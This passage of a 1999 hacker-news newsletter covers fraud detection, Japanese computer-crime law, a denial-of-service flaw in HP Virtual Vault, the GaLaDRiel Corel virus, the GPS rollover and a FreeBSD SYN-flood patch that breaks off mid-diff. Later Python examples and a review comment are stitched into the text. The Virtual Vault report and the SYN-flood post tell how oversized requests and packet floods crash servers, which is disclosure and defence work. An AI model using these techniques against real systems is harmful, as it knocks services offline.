"The Internet is quickly becoming a primary communications and e-commerce tool," said Norman Willox, chief
executive of the National Fraud Center, a white-collar antifraud firm and one of the partners in the Internet
Fraud Council. "Fraud on the Internet is increasing exponentially. Existing efforts [to fight it] have been
so specialized or fragmented that they have been ineffective."


Officials at the electronic crime center also announced yesterday a new FBI Internet Fraud Complaint Center,
which will collect complaints from across the country.

Willox said he expects the two centers to work together closely.

"Right now there's no tool that measures the loss from economic crime on the Internet," he said. "It doesn't
matter which organization is first to the scene of the crime as long as they share information."


"What we want to do is give people tools that make it too expensive for these guys to be fraudulent," Fichtman
said. "If we can do that, they'll leave the Internet and go somewhere else."

@HWA

49.0 Credit Card fraud under watchful eyes of eFalcon 'electronic brain'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


EFALCON PREYS ON CREDIT FRAUD (BUS. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/19662.html


It's an open secret that the Web is still the Wild West for
credit-card crooks. HNC Software hopes its new anti-fraud
software, eFalcon, will change that. By Craig Bicknell.

EFalcon Preys on Credit Fraud
by Craig Bicknell

3:00 a.m. 13.May.99.PDT
You may not know it, but the last time you used your credit card to buy a sporty
new shirt at the mall, you probably had to get the nod from a big brain named
Falcon.

A big electronic brain, that is. For the last six years, Falcon, software based on
neural networks, has been analyzing the purchasing patterns of more than 260
million credit cards. Over time, it has learned to spot the telltale signs of fraud.

Before most credit-card processors authorize a charge, they first get Falcon's
OK.

HNC Software, the creator of Falcon, hopes that online merchants will soon
start doing the same. This week, the company launched eFalcon, a form of
Falcon tweaked to detect the credit fraud that's so rampant online.


See also: Credit Card Fraud Bedevils Web


"Fraudulent transactions may exceed 10 percent of e-commerce merchant
revenues.... That's a huge problem," said HNC chief Robert North. In comparison,
fraudulent sales account for less than 1 percent of traditional retail revenues.

Credit-card company rules mandate that Web merchants, not consumers, pick up
the tab for bogus charges, plus a US$25 fee. It's a big strain for a fledgling
e-commerce company.

EFalcon will help merchants spot potentially fraudulent transactions in a
couple of different ways. When a user enters a credit-card number on a Web
site, the number and information about the proposed purchase are zipped off to
the Falcon database. There, the data will be assessed against the purchase history
on the card and scored for likelihood of fraud.

EFalcon bases the score on hundreds of factors, including the amount of
purchase, the type of merchandise and store, the time since last purchase, and
the location of the surfer's computer. If eFalcon has never seen the card before,
it will generate a score based on the average buying patterns of all
cardholders.

The higher the score, the more likely the purchase is fraudulent. Merchants decide
what the cutoff score will be for accepting a transaction.

EFalcon will also take into account the way a surfer moves around the
merchant's site. For example, a bona fide shopper is likely to linger before making a
purchase, while a crook heads straight for the Buy button.
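As an added example (not code from the article, from HNC or from eFalcon), here is the shape of the scoring scheme the article describes: each purchase is compared with the card's own history, an unseen card falls back to the population average, a higher score means more suspicious, and the merchant picks the cutoff. The card identifiers, purchase histories, factor weights and the 999 ceiling are all constructed for illustration; the real product weighs hundreds of factors.

```python
from dataclasses import dataclass
from statistics import mean, pstdev
from typing import List, Optional, Tuple


@dataclass
class Purchase:
    card: str                            # card identifier (constructed, not a real PAN)
    amount: float                        # purchase amount in USD
    category: str                        # type of merchandise / store
    country: str                         # where the shopper's machine appears to be
    seconds_since_last: Optional[float]  # None when there is no prior purchase
    seconds_on_site: float               # browsing time before hitting "Buy"


# Constructed per-card purchase history: (amount, category, country).
HISTORY = {
    "card-0001": [(42.0, "apparel", "US"), (58.0, "apparel", "US"),
                  (35.5, "books", "US"), (61.0, "apparel", "US")],
}

# Constructed all-cardholder profile, used when a card has never been seen.
POPULATION = [(45.0, "apparel", "US"), (120.0, "electronics", "US"),
              (30.0, "books", "CA"), (80.0, "software", "GB"),
              (55.0, "apparel", "DE")]


def profile_for(card: str) -> List[Tuple[float, str, str]]:
    """The card's own history if known, otherwise the population average."""
    return HISTORY.get(card, POPULATION)


def fraud_score(p: Purchase) -> int:
    """0 (looks normal) .. 999 (looks fraudulent). Weights are constructed."""
    hist = profile_for(p.card)
    amounts = [a for a, _, _ in hist]
    mu, sigma = mean(amounts), pstdev(amounts) or 1.0
    score = 0.0
    # Amount far above the usual spend for this profile: up to 500 points,
    # capped at five standard deviations so one huge value cannot dominate.
    z = (p.amount - mu) / sigma
    score += max(0.0, min(z, 5.0)) * 100
    # Merchandise type or apparent location never seen for this profile.
    if p.category not in {c for _, c, _ in hist}:
        score += 150
    if p.country not in {k for _, _, k in hist}:
        score += 150
    # Rapid-fire purchases on the same card.
    if p.seconds_since_last is not None and p.seconds_since_last < 120:
        score += 100
    # Heading straight for the Buy button instead of lingering.
    if p.seconds_on_site < 30:
        score += 100
    return int(min(score, 999))


def decide(p: Purchase, cutoff: int = 500) -> Tuple[str, int]:
    """Merchant policy: the cutoff score is the merchant's own choice."""
    s = fraud_score(p)
    return ("decline" if s >= cutoff else "accept"), s


if __name__ == "__main__":
    for p in (Purchase("card-0001", 55.0, "apparel", "US", 86400, 400),
              Purchase("card-0001", 1200.0, "electronics", "RO", 30, 8),
              Purchase("card-9999", 90.0, "books", "CA", None, 200)):
        print(p.card, decide(p))
```

The third purchase is on a card the system has never seen, so it is scored against the population profile rather than declined outright; lowering the cutoff is the merchant's lever for trading lost sales against chargebacks.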

Analysts who've taken a look at eFalcon are impressed. "I think it's going to be a
big success," said Avivah Litan, research director for payment systems at Gartner
Group. "They've got a lot of experience dealing with fraud in the physical world."

That is also its limitation, said William Donahoo, vice president of marketing at
CyberSource, a competing firm that also makes fraud detection software for the
Web. Unlike HNC, CyberSource has been making anti-fraud software for the Web
exclusively, since the earliest days of e-commerce.

"The difference between the online world and the brick-and-mortar world is night
and day," said Donahoo. "We're a fraud system built by the Internet and for the
Internet."


Still, he's glad to see HNC entering the market. "It's a validation that they, too,
see the need for risk-management services online. Fraud will only become a
bigger and bigger issue as more shoppers come onto the Web."


@HWA

50.0 [ISN] A ban on unauthorized computer access in Japan to be enacted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From the ISN mailing list

Forwarded From: "Prosser, Mike" <mike.prosser@L-3Security.com>

May 13, 1999 (TOKYO) -- Legislation to outlaw unauthorized access to
computer networks will go into effect in Japan by the end of this year at
the earliest, and the penalties will include fines or imprisonment.

The bill, sponsored jointly by the National Police Agency, the Ministry
of Posts and Telecommunications, and the Ministry of International Trade
and Industry (MITI), was submitted to the Diet after it was adopted at a
Cabinet meeting on April 16. It is expected to pass the Diet by the end
of June.
The concerned government agencies will make the bill to ban unauthorized access a
new law, and not simply an amendment to the Criminal Law or the Telecommunications
Business Law. Under the terms of the legislation, unauthorized access is defined as
"any unauthorized logging in to a computer network using another person's ID or
password, or any attack on a security hole in an operating system or application."
The bill will ban such unauthorized access. The penalties will include imprisonment
for up to one year or fines of up to 500,000 yen. (121.03 yen = US$1)

Also, the bill will outlaw "any acts to promote unauthorized access" such as
provision or sales of a user ID and password to a third party. In such cases,
penalties will be fines of up to 300,000 yen. Even in the United States and Europe,
where laws banning unauthorized access have already been enacted, few countries ban
acts to promote unauthorized access.

The bill will protect "all networked computers, those which control access with a
user authentication via a user ID or password as well as authentication results"
from unauthorized access. Networks will include the Internet, public circuits and
corporate dedicated lines.

The new bill will not require corporate system administrators to "preserve log on
records of protected computers," which the NPA has sought. Preservation of logs was
excluded from the bill based on discussions among the three concerned parties.

In November 1998, the NPA sought to require companies to preserve their log records,
based on its view that "those to be protected by the bill and obliged parties are
identical." However, many companies said that such a requirement would impose a
tremendous burden on them and that it wouldn't necessarily help prevent unauthorized
access.

Nonetheless, companies will still be expected to make their best efforts to preserve
log records to detect any unauthorized access at an early stage and minimize damages.
The bill will not have its intended effect unless companies take some measures to
prevent unauthorized access. Therefore, the three parties decided to ask companies to
implement voluntary efforts to take some measures to prevent unauthorized access.
Specifically, system administrators are expected to manage passwords on a thorough
basis, and to implement a variety of preventive measures. Although it is not legally
binding, most system administrators will likely implement such preventive measures on
a voluntary basis.


-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

51.0 Virtual Vault Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Virtual Vault Vulnerable


contributed by John Daniele
John Daniele has released a report that details a trivial
DoS attack on HP's Virtual Vault operating system.
Virtual Vault is a B1 and B2 DoD compliant system
that is very popular with banks and e-commerce
systems. HP claims to have addressed this problem in
patch PHSS 10747 however numerous sites remain
vulnerable.


TGAD DoS
http://www.faber.to/foo/vvos.htm

VirtualVault Overview

The VirtualVault operating system is HP's solution to secure
electronic commerce. It is a B1 and B2 DoD compliant system
that is becoming increasingly popular with big business, banks, etc.
The main security mechanism on which VVOS is based is data partitioning.
Data on the system is classified into one of four security classes, or 'vaults' --
INSIDE, OUTSIDE, SYSTEM and SYSTEM HIGH. The INSIDE vault houses the server's
backend applications and databases. The OUTSIDE vault generally
contains the internet front end and any necessary CGI binaries, etc.
SYSTEM and SYSTEM HIGH are responsible for maintaining the external
webpages and audit logs respectively. These vaults are totally segregated
from each other and work essentially as separate machines. If a
program requires access to either of the vaults it must be authenticated
by HP's Trusted Gateway Proxy daemon. The TGP daemon filters all requests
from the internet and forwards them to middleware server packages that
safely reside behind the INSIDE vault.

TGA Bug

While the TGP daemon does a good job of ensuring the integrity of the
request prior to forwarding data to its destination, the trusted
gateway agent that is responsible for wrapping CGI requests does not
check the length of the request prior to sending it to TGP. This poses
a problem since TGA does not correctly handle request messages that
are more than 512 bytes in length. The result is a trivial DoS attack on
TGA and all services being wrapped by TGA. The bug was discovered during a
penetration test on a client system running VVOS 3.01. A post was made to
a CGI application residing on the system with a large string of characters.
This was then sent to the trusted gateway agent, causing the daemon
to crash, leaving the Netscape Enterprise Server unable to service further
HTTP/SSL requests. The NES logs show the following:

[07/May/1999:16:16:22] security: for host xxx.xxx.xxx.xxx trying to
GET /cgi-bin/somecgi.cgi?AAAAAAAAAAAAAAA..., vvtga_log reports: ERROR: setup_connection():
Failed to transfer execution message to TGA daemon

And when NES is started back up:

[07/May/1999:16:28:18] info: successful server startup
[07/May/1999:16:28:18] info: Netscape-Enterprise/3.5.1G B98.169.2301
[07/May/1999:16:33:18] failure: Error accepting connection -5993 (Resource temporarily unavailable)

FIX

Chris Hudel of HP was notified of this bug on Wednesday May 12, 1999. He stated
that HP was aware of the problem and addressed it in patch PHSS 10747. However, I am not
aware of HP releasing an official 'bug report' on this issue.
Since I have encountered several VVOS systems this past week that have not
been patched, and sysadmins unaware of this bug and patch, I decided to post the
details publicly. NOTE: I have not tested this bug against PHSS 10747 and would
appreciate input from those who have at foo@faber.to.

- John Daniele
jdaniele@kpmg.ca
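As an added example, not part of John Daniele's report or of HP's software: detection logic an administrator could run over NES log lines of the kind quoted above. It pulls out TGA transfer failures with the requesting host and the query length, flags the accept failures that follow a restart, and includes the length guard that the report says TGA itself lacks, for use at a front end until PHSS 10747 is applied. The sample lines are constructed from the report's format; the host address and the 600-byte query are made up.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

TGA_LIMIT = 512  # request size beyond which the report says TGA misbehaves

# Constructed sample modelled on the NES log lines in the report.
SAMPLE_LOG = [
    "[07/May/1999:16:16:22] security: for host 192.0.2.10 trying to "
    "GET /cgi-bin/somecgi.cgi?" + "A" * 600 + ", vvtga_log reports: ERROR: "
    "setup_connection(): Failed to transfer execution message to TGA daemon",
    "[07/May/1999:16:28:18] info: successful server startup",
    "[07/May/1999:16:28:18] info: Netscape-Enterprise/3.5.1G B98.169.2301",
    "[07/May/1999:16:33:18] failure: Error accepting connection -5993 "
    "(Resource temporarily unavailable)",
]

LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]\s+(?P<level>\w+):\s+(?P<msg>.*)$")
TGA_RE = re.compile(r"for host (?P<host>\S+) trying to (?P<method>[A-Z]+) "
                    r"(?P<url>\S+?), vvtga_log reports: (?P<err>.*)$")


@dataclass
class Finding:
    ts: str
    kind: str        # "tga_transfer_failure" or "accept_failure"
    host: str        # remote host, or "-" for server-side events
    oversized: bool  # query part exceeded TGA_LIMIT
    detail: str


def scan(lines: List[str]) -> List[Finding]:
    """Turn raw NES log lines into findings worth alerting on."""
    findings = []
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        ts, level, msg = m.group("ts", "level", "msg")
        if level == "security" and "TGA daemon" in msg:
            t = TGA_RE.search(msg)
            if not t:
                continue
            path, _, query = t.group("url").partition("?")
            findings.append(Finding(ts, "tga_transfer_failure", t.group("host"),
                                    len(query) > TGA_LIMIT,
                                    f"{t.group('method')} {path} query_len={len(query)}"))
        elif level == "failure" and "Error accepting connection" in msg:
            # After a restart this is the symptom of a wedged TGA.
            findings.append(Finding(ts, "accept_failure", "-", False, msg))
    return findings


def summarize(findings: List[Finding]) -> Dict[Tuple[str, str], int]:
    """Counts per (kind, host): the numbers an admin would page on."""
    counts: Dict[Tuple[str, str], int] = {}
    for f in findings:
        counts[(f.kind, f.host)] = counts.get((f.kind, f.host), 0) + 1
    return counts


def request_within_limit(query: str) -> bool:
    """Front-end guard: refuse to forward a CGI query longer than TGA handles."""
    return len(query.encode()) <= TGA_LIMIT


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
    print(summarize(scan(SAMPLE_LOG)))
```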


@HWA


52.0 GaLaDRiel PoC (Proof of concept) Corel virus resurfaces in the wild
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Corel Scripts Infected by New Virus

From HNN http://www.hackernews.com/

contributed by tetricycle
The GaLaDRiel (or C.S.Gala) virus infects the script
language used by Corel products. This particular version
is not malicious and only displays a text message. The
message is only displayed on June 6 and contains seven
lines from J.R.R. Tolkien's The Lord of the Rings.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,10954,00.html


Virus Infects Corel Scripts

Virus is low risk, not easily spread, and causes minor damage.

by Stan Miastkowski, special to PC World
May 13, 1999, 6:38 p.m. PT

A new wrinkle in computer viruses appeared this week with the discovery of a virus that infects the script
language used by Corel products. But experts say the GaLaDRiel (or C.S.Gala) virus will affect few users, and
is not destructive.

The virus is not contained in the company's applications, according to a Corel representative. You
can get it only by receiving an infected script file from another user via disk or download. When it triggers, all
the virus does is display text.

GaLaDRiel is "in the low-risk category," according to Sal Viveros, a spokesperson for Network Associates,
maker of McAfee Antivirus. The virus is rare, doesn't spread easily, and causes minimal damage, Viveros
says.

Although GaLaDRiel has the potential to infect other Corel Script files, it doesn't launch automatically. You
have to run the infected script for it to spread. And the virus doesn't infect program files.

After GaLaDRiel infects a Corel Script file, it will run its payload on June 6 only, displaying seven lines from
J.R.R. Tolkien's The Lord of the Rings. As far as virus researchers have been able to ascertain, GaLaDRiel
does nothing else.

All major developers of antivirus software plan to add detection and removal of GaLaDRiel to their latest virus
updates within the next two weeks.

How to Check for the Virus

Corel recommends taking the following steps to see if your scripts have been infected and to remove the virus
if they have been:

1. Using Windows Explorer, browse the directory that contains the potentially infected scripts.

2. Right-click on a Corel Script (.csc) file and select Open.

3. When the Corel Script Editor opens, examine the first line of the script. If the text begins with REM
ViRUS GaLaDRiel, then your script is infected.

4. To cure the infection, delete all the script lines from REM ViRUS GaLaDRiel to REM END OF ViRUS.

5. Resave your Corel Script file with the same name, overwriting the infected version.

6. Repeat the above steps for all .csc files in the same directory. (This final step is important, because running
any infected Corel Script file will infect all other .csc files in the same directory.)
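The six steps above, carried out in code as an added example (not Corel's or PC World's tool): check the first line for the marker, cut everything from the start marker through the end marker, save the file under the same name, and repeat for every .csc in the directory. The markers are the ones Corel names; the script contents in the sample are constructed stand-ins, not the real viral body.

```python
import tempfile
from pathlib import Path
from typing import Dict

START_MARK = "REM ViRUS GaLaDRiel"   # first line of an infected script
END_MARK = "REM END OF ViRUS"        # last line of the inserted block

# Constructed sample: a harmless two-line script with a stub block prepended.
INFECTED_SAMPLE = (
    "REM ViRUS GaLaDRiel\n"
    "REM (constructed stand-in for the viral body)\n"
    "REM END OF ViRUS\n"
    "REM harmless script body\n"
    "MESSAGE \"hello\"\n"
)
CLEAN_SAMPLE = "REM harmless script body\nMESSAGE \"hello\"\n"


def is_infected(text: str) -> bool:
    """Step 3: an infected script's first line starts with the marker."""
    first = text.splitlines()[0] if text else ""
    return first.lstrip().startswith(START_MARK)


def disinfect(text: str) -> str:
    """Step 4: drop every line from the start marker through the end marker."""
    if not is_infected(text):
        return text
    lines = text.splitlines(keepends=True)
    for i, line in enumerate(lines):
        if line.strip().startswith(END_MARK):
            return "".join(lines[i + 1:])
    # A start marker without an end marker is not the documented layout;
    # leave the file alone rather than guess where the block ends.
    raise ValueError("start marker without end marker; refusing to guess")


def clean_directory(directory: str) -> Dict[str, str]:
    """Steps 5 and 6: rewrite every infected .csc in place, report per file."""
    report: Dict[str, str] = {}
    for path in sorted(Path(directory).iterdir()):
        if path.suffix.lower() != ".csc":
            continue
        text = path.read_text()
        if is_infected(text):
            path.write_text(disinfect(text))   # same name, overwriting
            report[path.name] = "cleaned"
        else:
            report[path.name] = "clean"
    return report


def demo() -> Dict[str, str]:
    """Scratch directory with one infected script, one clean one, one non-script."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "logo.csc").write_text(INFECTED_SAMPLE)
        Path(d, "print.csc").write_text(CLEAN_SAMPLE)
        Path(d, "readme.txt").write_text("not a script\n")
        report = clean_directory(d)
        assert Path(d, "logo.csc").read_text() == CLEAN_SAMPLE
        return report


if __name__ == "__main__":
    print(demo())
```

Because step 6 warns that running any infected script infects every .csc in the same directory, the directory pass is the unit of work, not the single file.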


@HWA

53.0 DoD labels attacks as 'nuisance'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

DOD Labels Attacks as "Nuisance"


contributed by erewhon
The Defense Information Agency's Joint Task Force for
Computer Network Defense has labeled the recent
attacks of DOD web sites by Chinese individuals as
nothing more than a nuisance and that the attacks
have had "no operational impact or effect."

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0510/web-nuisance-5-13-99.html


MAY 13, 1999 . . . 18:40 EDT


Pentagon confirms 'nuisance' cyberattacks

BY BOB BREWIN (antenna@fcw.com)

The Pentagon identified what it called "nuisance-level" attacks against its
World Wide Web sites that resemble the attacks by Chinese hackers against
sites operated by the departments of Energy and Interior earlier this week.

In response to a query from FCW about any Chinese attacks against DOD
Web sites, a spokeswoman for the Defense Information Agency's Joint Task
Force for Computer Network Defense said, "We're aware of the activities you
mention. The JTF-CND has only a few isolated reports of activities across
DOD which might be attributed to these sources. The damage has been at the
'nuisance level' with no operational impact or effect."


The spokeswoman added that the JTF-CND would take action only when such
attacks would have a "widespread effect" on the Defense Information
Infrastructure, which comprises global DOD networks and information systems,
or when such attacks are spread broadly across network or information systems
operated by more than one of the services.

According to nongovernment network security experts, Chinese hackers
launched Web attacks earlier this week in response to the U.S. bombing of the
Chinese embassy in Belgrade.

@HWA

54.0 GPS's Y2K crisis comes early
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Jan 1, 2000 or Aug 21, 1999, which is worse?


contributed by Time L0rd
By now everyone has heard of Y2K. How many have
heard of August 21? That is the date when many
handheld GPS systems may go wacko. The GPS
satellites keep track of dates by measuring the number
of weeks elapsed since January 5-6, 1980. Every 1,024
weeks, the timer resets to zero. The first time this
will happen is August 21. People suspect that older GPS
units may not be able to read this time accurately. (I
knew there was a reason I waited to buy one)

CNN

Experts say consumers may be hardest hit by GPS computer time change

May 12, 1999
Web posted at: 7:35 PM EDT (2335 GMT)

WASHINGTON (AP) -- By now everyone knows about computers and
midnight, December 31. But what's going to happen on August 21?

That's when computer clocks roll over in the Global Positioning System, the
network of satellites that keeps ships and nuclear missiles on course and
provides precise time measurements for computer networks and public
utilities.

A joint congressional subcommittee held a hearing Wednesday to assess the
potential impact. It heard that while the military and space communities are
ready for the adjustment, consumers and small businesses may be the hardest
hit.

The Global Positioning System is made up of 24 orbiting satellites that allow
anyone with a GPS receiver to pinpoint their position on Earth. The satellites
keep track of dates by measuring the number of weeks elapsed since January
5-6, 1980. Every 1,024 weeks, the timer will reset to zero, which will occur for
the first time as August 21 turns to August 22.
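The arithmetic behind that paragraph, as an added example (not from the article or from any receiver vendor): the week count since the 6 January 1980 epoch, the 10-bit value the satellites broadcast, the instant it first wraps, and the two ways a receiver can turn the wrapped value back into a date. The naive decoder is the failure mode the hearing was about; the pivot-date decoder is the usual fix, with the firmware build date standing in as the pivot (an assumption, not something the article states).

```python
from datetime import datetime, timedelta

# The GPS week count started at 00:00 UTC on Sunday, 6 January 1980
# (the "January 5-6, 1980" boundary in the article).
GPS_EPOCH = datetime(1980, 1, 6)
WEEK = timedelta(days=7)
WEEK_MODULUS = 1024          # the broadcast week number is a 10-bit field


def gps_week(t: datetime) -> int:
    """Full (unwrapped) week count since the GPS epoch."""
    return (t - GPS_EPOCH) // WEEK


def broadcast_week(t: datetime) -> int:
    """What the satellites actually transmit: the week count modulo 1024."""
    return gps_week(t) % WEEK_MODULUS


def first_rollover() -> datetime:
    """The instant the 10-bit counter first wraps back to zero (UTC)."""
    return GPS_EPOCH + WEEK_MODULUS * WEEK


def naive_week_start(week10: int) -> datetime:
    """A receiver that assumes the counter never wrapped: the failure mode."""
    return GPS_EPOCH + week10 * WEEK


def pivoted_week_start(week10: int, pivot: datetime) -> datetime:
    """Disambiguate with a pivot date the receiver knows is in the past
    (assumed here to be its firmware build date): choose the era in which
    the broadcast week falls on or after the pivot. Good for 1024 weeks,
    about 19.6 years, after the pivot."""
    pivot_week = gps_week(pivot)
    candidate = (pivot_week // WEEK_MODULUS) * WEEK_MODULUS + week10
    if candidate < pivot_week:
        candidate += WEEK_MODULUS
    return GPS_EPOCH + candidate * WEEK


if __name__ == "__main__":
    just_after = first_rollover() + timedelta(seconds=1)
    w = broadcast_week(just_after)
    print("first rollover (UTC):", first_rollover())
    print("broadcast week just after it:", w)
    print("old receiver decodes week as:", naive_week_start(w).date())
    print("pivoted receiver decodes it as:",
          pivoted_week_start(w, datetime(1999, 5, 12)).date())
```

Midnight UTC on 22 August is the evening of 21 August in the United States, which is why the article has the rollover "as August 21 turns to August 22".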

"The satellites will not fall out of the sky, they will not lose their power," Keith
Rhodes, technical director in the Office of the Chief Scientist at the General
Accounting Office, told members of the House Science and Government
Reform committees. "The problem will be on the ground, with what you hold
in your hand."


Handheld receivers such as those popular with mountaineers, sailors and some
motorists are "probably going to have a problem" if they are more than five
years old, Rhodes said.

Also vulnerable are small computer networks that rely on GPS time signals, a
desirable form of time measurement because they are accurate to within
three-billionths of a second.

More widespread computer problems are expected a little more than four
months later, when the calendar changes from December 31, 1999, to January
1, 2000 -- the Y2K witching hour. Many computers originally programmed to
recognize only the last two digits of a year will not work properly beginning
January 1, 2000, when some machines will assume it is 1900 and could
therefore malfunction.

@HWA

55.0 Retinal Scans?
~~~~~~~~~~~~~~

Forget giving your sister your atm card to grab you some cash when you can't get out...

From HNN http://www.hackernews.com/

"Prepare for Retina Scan"


contributed by Shatner
No ATM card or PIN numbers needed. Bank United,
based in Texas, is the first to offer Iris scans at its
ATMs for its customers. Just walk up to the ATM, let
the computer check out your eyeball and withdraw
some dough. In response to questions about privacy
concerns, Bank United said the iris pictures will not be
distributed to anyone outside the bank. (Unless they
get subpoenaed or cracked, of course.)

Nando Times
http://www.techserver.com/story/body/0,1634,48513-78144-556814-0,00.html

Texas bank offers 1st eye-recognition ATM in U.S.

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

By TERRI LANGFORD

HOUSTON (May 13, 1999 6:03 p.m. EDT http://www.nandotimes.com) - If you can't tell twins Michael
and Richard Swartz apart, do what Bank United of Texas does - look them in the eye. On Thursday,
the bank became the first in the United States to offer iris recognition technology at automated
teller machines, providing the Swartzes and other customers a cardless, password-free way to get
their money out of an ATM.

"It knows you just by looking at you," said Ron Koben, Bank United executive vice president.

The concept works because the intricate pattern of each person's iris is more distinctive than
even a fingerprint.

Here's how it works: A customer has a close-up photo of his eye taken at the bank, and the picture
is stored in a computer. When the customer goes up to the ATM to take out money, he presses a button
to start an eye scan. The ATM then matches the picture of the iris with the one stored in the bank's
database to confirm the customer's identity.

To demonstrate, Richard Swartz, a 25-year-old Rice University graduate student, had his iris
photographed by a bank employee. Minutes later, Swartz was able to withdraw $40 from his account
without inserting a card or punching in a secret code.

Then, Swartz's brother Michael walked up to the machine. But since his iris didn't match his brother's,
the ATM refused access.

Iris identification is already used at 11 banks outside the United States and may eventually be
extended to many other kinds of financial transactions.

Bank United hopes to have more eye-scanning ATMs up and running within the next year. Several other
banks in the United States are expected to unveil iris identification teller machines later this year.

"It has a very high cool factor," Koben said. "We think of it as James Bond meets stocks and bonds."

The iris recognition and software process was invented a few years ago by John Daugman of Cambridge
University in England. It is marketed in this country to financial institutions by Sensar Inc. of
Moorestown, N.J.

"This event clearly establishes iris identification as the emerging standard in personal electronic
identification," said Robert Van Naarden, Sensar vice president of marketing and customer service. "Iris
identification is the most secure, robust and stable form of identification known to man."


In response to questions about privacy concerns, Bank United said the iris pictures will not be
distributed to anyone outside the bank.


@HWA


56.0 FreeBSD high speed SYNflood patch
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Return-Path: <owner-bugtraq@netspace.org>
Date: Thu, 13 May 1999 11:35:43 -0700
Reply-To: Richard Steenbergen <humble@LIGHTNING.NET>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Richard Steenbergen <humble@LIGHTNING.NET>
Subject: SYN floods against FreeBSD
To: BUGTRAQ@netspace.org


Here's a quickie for the people who have been plagued with high bandwidth
syn flood attacks, a kernel patch for FreeBSD 3.1-STABLE which rate limits
SYN processing. It's messy but functional and I don't have time to make it
better (that's the fbsd developers' job, not mine :P), cd /usr/src/sys,
patch < synlim, add "options SYN_RATELIM" (I highly recommend ICMP_BANDLIM
as well) to your kernel, recompile, and sysctl net.inet.tcp.synlim will be
available (defaults to 100). This is the maximum number of SYNs per second
that will be processed, the rest will be silently discarded. On my test
system (P2 450 running 3.1-stable being hit w/15,000 packets per sec),
this has successfully brought CPU usage from 100% to ~20% (against an open
port which is replying with unacknowledged ACKs).


Which brings us to the more sticky topic of kernel panics when under SYN
flood (which I believe to be the cause of some earlier posts from certain
people at Exodus Communications *cough*). Lord knows I found enough of
them when doing this testing, but the one that seems to be the biggie for
crashing when under syn flood is as follows (heh just turned off the
synlim and panic'd within 8 seconds while writing this):


panic: free: multiple frees
(kgdb) bt
#0 boot (howto=256) at ../../kern/kern_shutdown.c:285
#1 0xc0138c09 in panic (fmt=0xc02192b7 "free: multiple frees")
at ../../kern/kern_shutdown.c:446
#2 0xc0135aaf in free (addr=0xc0cdd600, type=0xc0239330)
at ../../kern/kern_malloc.c:333
#3 0xc01768f4 in ifafree (ifa=0xc0cdd600) at ../../net/route.c:262
#4 0xc0176876 in rtfree (rt=0xc34ce700) at ../../net/route.c:236
#5 0xc0176c84 in rtrequest (req=2, dst=0xc34cbac0, gateway=0xc34cbad0,
netmask=0x0, flags=393223, ret_nrt=0x0) at ../../net/route.c:536
#6 0xc017b34d in in_rtqkill (rn=0xc34ce700, rock=0xc0231610)
at ../../netinet/in_rmx.c:242
#7 0xc0176064 in rn_walktree (h=0xc0cd9e00, f=0xc017b2fc <in_rtqkill>,
w=0xc0231610) at ../../net/radix.c:956
#8 0xc017b3ec in in_rtqtimo (rock=0xc0cd9e00) at ../../netinet/in_rmx.c:283
#9 0xc013d19b in softclock () at ../../kern/kern_timeout.c:124


Which after a quick examination seems to be a periodic routing table
cleanup. It seems that in_rtqtimo is scheduled to run every
net.inet.ip.rtexpire seconds (which is dynamically adjusted and can never go
lower than net.inet.ip.rtminexpire). When the system is under heavy load
from processing lots of small packets (they don't even have to be SYNs,
anything which can get routed will do the trick, though the packet kiddies
would get very little gain from just sending an ip header since it's going
to be padded to 64 bytes for the eth frame anyhow), this route cleanup
code will go whacking at routes it shouldn't and free some memory twice. In
the course of testing I've gotten my rtq_reallyold to -3 and seen lots of
"tvotohz: negative time difference -2 sec 0 usec". Perhaps someone with
free time or more specific knowledge of this area would like to FIX IT? =)


Perhaps when I get more free time I'll test some other *nix's. I would
really recommend putting all this rate limiting code at an ipfw level.


If you would like to contact me regarding this please use
humble@quadrunner.com (at least if you want a quick reply), thanks.


--
Richard Steenbergen <humble@lightning.net> humble@EFNet PGP ID: 0x741D0374
PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374
http://users.quadrunner.com/humble


synlim


*** conf/options.old Sat May 15 23:08:03 1999
--- conf/options Sat May 15 23:40:21 1999
***************
*** 68,73 ****
--- 68,74 ----
SYSVSHM opt_sysvipc.h
UCONSOLE
ICMP_BANDLIM
+ SYN_RATELIM

# POSIX kernel options
P1003_1B opt_posix.h
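Review bot: the new SYN_RATELIM entry names no header file, while the tcp_var.h hunk does `#include "opt_syn_ratelim.h"`; entries in this file that are meant to be picked up through a per-option header spell the header out, as `SYSVSHM opt_sysvipc.h` does two lines up, whereas the headerless form used for ICMP_BANDLIM is consumed with a bare #ifdef. Either write the entry as `SYN_RATELIM opt_syn_ratelim.h` or drop the include and rely on the #ifdef, but as posted the two halves do not agree.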
*** netinet/tcp_var.h.old Sat May 15 23:25:39 1999
--- netinet/tcp_var.h Sat May 15 23:45:05 1999
***************
*** 40,45 ****
--- 40,49 ----
* Kernel variables for tcp.
*/

+ #ifdef KERNEL
+ #include "opt_syn_ratelim.h"
+ #endif
+
/*
* Tcp control block, one per tcp; fields:
* Organized for 16 byte cacheline efficiency.
***************
*** 305,311 ****
